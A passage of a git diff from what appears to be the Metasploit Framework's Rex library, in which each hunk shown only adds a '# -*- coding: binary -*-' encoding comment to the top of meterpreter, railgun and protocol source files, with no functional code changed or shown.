diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb
index 0d1e017a15..18bfdeb90b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb
index b971dbc203..5150a1381a 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb
index 94f5a2a8a6..d92d0433da 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
index d3f84e4c10..9aeeba59ca 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb
index 6809873635..36462c6b71 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb
index f23f10625a..39faa667a6 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..','..','..','..','..', '..', '..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
index 9a6bdbabf6..549cc8aa28 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb
index 48ba844768..d55b69df79 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb
index 215a0cc210..1cc1e33fa3 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb
index 4e7863fed6..f195c918bd 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/platform_util'
module Rex
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb
index 9945f844fa..cef4267ba4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..','..','..','..','..', '..', '..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb
index 00e7f8a3de..9e70fcba14 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_helper'
module Rex
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb
index 99dde10650..06b42e9a78 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb
index 9d53452cee..de36574f45 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
index 1c99e6f808..61a9609e1f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/object_aliases'
require 'rex/post/meterpreter/extension'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
index 26aa60529c..cf80bdb19c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
index 80f9a1e1de..a8c8ead6ff 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb
index 45ad8f7013..c25981f2b2 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
index 3850b3f840..001131651f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
index e0313e3850..e4a8832a61 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
index cd5b68b5da..d748005cb4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb
index c4fc876250..dfb32d7ac1 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
index a127c566c4..e5920825b6 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
index ee7c8b8303..e0345c8230 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
index 633dd218c2..a730df4c4b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
index 9430f6ed7d..9fd9866b21 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/sys/registry'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
index 96850a389b..faa8cbd4c0 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/sys/registry'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb
index fd7672bfcf..95cdfac56b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/sys/registry'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
index fae12eedcc..1a244d3c2f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/thread'
require 'rex/post/meterpreter/client'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 8872190955..8e75c73310 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
index 3b4947a6b0..7928ea9a86 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/ui'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
index b7d74090ed..1a2d5cc478 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/inbound_packet_handler.rb b/lib/rex/post/meterpreter/inbound_packet_handler.rb
index 2eb8faae21..332afbbe1e 100644
--- a/lib/rex/post/meterpreter/inbound_packet_handler.rb
+++ b/lib/rex/post/meterpreter/inbound_packet_handler.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/object_aliases.rb b/lib/rex/post/meterpreter/object_aliases.rb
index 206c532e6b..4e40d27aff 100644
--- a/lib/rex/post/meterpreter/object_aliases.rb
+++ b/lib/rex/post/meterpreter/object_aliases.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 3b1cba013c..9dbcdc0c1e 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index 198baa5170..5b249ee2fa 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/packet_response_waiter'
require 'rex/logging'
diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb
index 6f4d778f84..911fd8d77f 100644
--- a/lib/rex/post/meterpreter/packet_parser.rb
+++ b/lib/rex/post/meterpreter/packet_parser.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/packet_response_waiter.rb b/lib/rex/post/meterpreter/packet_response_waiter.rb
index 9fbb48df51..4d0063fd40 100644
--- a/lib/rex/post/meterpreter/packet_response_waiter.rb
+++ b/lib/rex/post/meterpreter/packet_response_waiter.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'timeout'
require 'thread'
diff --git a/lib/rex/post/meterpreter/ui/console.rb b/lib/rex/post/meterpreter/ui/console.rb
index fe71ee01f6..6b3532886e 100644
--- a/lib/rex/post/meterpreter/ui/console.rb
+++ b/lib/rex/post/meterpreter/ui/console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'rex/post/meterpreter'
require 'rex/logging'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb
index bd791d36cb..f0384e664d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/logging'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index def9219ad1..4d811964f8 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'rex/parser/arguments'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
index 92691f7b01..cd4a981d0c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
index c931291a79..d6e2827f13 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
index 070d95f4b3..8acec7a477 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
index a8255adae4..06a0f26f8c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
index 4ad9254f47..0af6bffc7d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
index ba0d51980d..b8b7290a65 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
index 8df3a15448..d2a0af4449 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index 56a34aec31..83f50d72ae 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
index 38fb39d31d..686f96e36a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index d8c91b1934..e209150b4c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'tempfile'
require 'rex/post/meterpreter'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
index 5f13d037fa..2c5b360d0b 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'rex/service_manager'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 9136463af1..138ea2eaab 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
index c94f860dbc..66cc28d845 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
index 5c94f44a9b..e2d05bfa2a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/interactive_channel.rb b/lib/rex/post/meterpreter/ui/console/interactive_channel.rb
index 4e6cfe29eb..4e26f4d156 100644
--- a/lib/rex/post/meterpreter/ui/console/interactive_channel.rb
+++ b/lib/rex/post/meterpreter/ui/console/interactive_channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/permission.rb b/lib/rex/post/permission.rb
index eb85c9596f..8f16f514ee 100644
--- a/lib/rex/post/permission.rb
+++ b/lib/rex/post/permission.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Generic page protection flags
PROT_NONE = 0
diff --git a/lib/rex/post/process.rb b/lib/rex/post/process.rb
index 8b5a436c44..08c89da7f7 100644
--- a/lib/rex/post/process.rb
+++ b/lib/rex/post/process.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/thread.rb b/lib/rex/post/thread.rb
index f5ca219795..7a09b18136 100644
--- a/lib/rex/post/thread.rb
+++ b/lib/rex/post/thread.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/ui.rb b/lib/rex/post/ui.rb
index b009078138..eca0f3041e 100644
--- a/lib/rex/post/ui.rb
+++ b/lib/rex/post/ui.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/proto.rb b/lib/rex/proto.rb
index ce7c2eb805..923fa4626d 100644
--- a/lib/rex/proto.rb
+++ b/lib/rex/proto.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
require 'rex/proto/smb'
require 'rex/proto/ntlm'
diff --git a/lib/rex/proto.rb.ts.rb b/lib/rex/proto.rb.ts.rb
index 85d5c87b27..3e85f03bdf 100644
--- a/lib/rex/proto.rb.ts.rb
+++ b/lib/rex/proto.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/proto/dcerpc.rb b/lib/rex/proto/dcerpc.rb
index a62f4862b1..168a3ba87b 100644
--- a/lib/rex/proto/dcerpc.rb
+++ b/lib/rex/proto/dcerpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/dcerpc/uuid'
require 'rex/proto/dcerpc/response'
require 'rex/proto/dcerpc/client'
diff --git a/lib/rex/proto/dcerpc.rb.ts.rb b/lib/rex/proto/dcerpc.rb.ts.rb
index 4a908323cd..47e38f9af3 100644
--- a/lib/rex/proto/dcerpc.rb.ts.rb
+++ b/lib/rex/proto/dcerpc.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/test'
require 'rex/proto/dcerpc/uuid.rb.ut'
diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb
index ed24e48e95..928e5eb4bf 100644
--- a/lib/rex/proto/dcerpc/client.rb
+++ b/lib/rex/proto/dcerpc/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/client.rb.ut.rb b/lib/rex/proto/dcerpc/client.rb.ut.rb
